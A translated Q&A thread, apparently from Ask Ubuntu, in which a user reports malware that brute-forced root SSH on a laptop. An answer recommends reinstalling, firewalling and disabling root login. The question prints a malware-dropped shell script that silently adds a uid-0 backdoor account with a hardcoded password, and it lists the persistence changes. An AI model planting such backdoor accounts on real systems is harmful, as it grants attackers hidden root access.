我相当确定我的 Ubuntu 13.10 笔记本电脑感染了某种恶意软件。
每隔一段时间,我就会发现一个进程 /lib/sshd(由 root 拥有)正在运行并消耗大量 CPU。它不是运行 /usr/sbin/sshd 的 sshd 服务器。
二进制文件具有 --wxrw-rwt 权限,它在 /lib 目录中生成和生成脚本。最近的一个名为 13959730401387633604,它执行以下操作
#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd
gusr用户是由恶意软件独立创建的,然后chpasswd挂掉,消耗100%cpu。
到目前为止,我已经确定 gusr 用户被额外添加到 /etc/ 中的文件中
/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid
似乎恶意软件使用“-”后缀复制了所有这些文件。由 root 修改的 /etc/ 文件的完整列表可在此处获得。
此外,/etc/hosts 文件已更改为此.
/lib/sshd 首先将自身添加到 /etc/init.d/rc.local 文件的末尾!
我删除了用户,删除了文件,杀死了处理树,更改了我的密码并删除了 ssh 公钥。
我知道我基本上被搞砸了,我很可能会重新安装整个系统。尽管如此,由于我登录到其他几台机器,因此至少尝试删除它并弄清楚我是如何得到它的会很好。任何有关如何解决此问题的建议将不胜感激。
看起来他们是在 3 月 25 日通过暴力破解 root 登录进入的。我不知道在 Ubuntu 中默认启用 root ssh。我禁用了它并设置了拒绝主机。
登录名来自 59.188.247.236,显然在香港的某个地方。
我从EmperorLinux 获得了笔记本电脑,他们启用了root 访问权限。如果您有其中之一并且正在运行 sshd,请当心。
Set*_*eth 11
首先,现在让那台机器脱离网络!
其次,为什么要启用 root 帐户?您真的不应该启用 root 帐户,除非您有充分的理由这样做。
第三,是的,确保您干净的唯一方法是进行全新安装。还建议您重新开始,不要返回备份,因为您永远无法确定一切何时开始。
我还建议您在下次安装时设置防火墙并拒绝所有传入连接:
sudo ufw default deny incoming
然后允许 ssh 使用:
sudo ufw allow ssh
并且不要启用 root 帐户!当然要确保 root ssh 登录被禁用。
| 归档时间: |
|
| 查看次数: |
1183 次 |
| 最近记录: |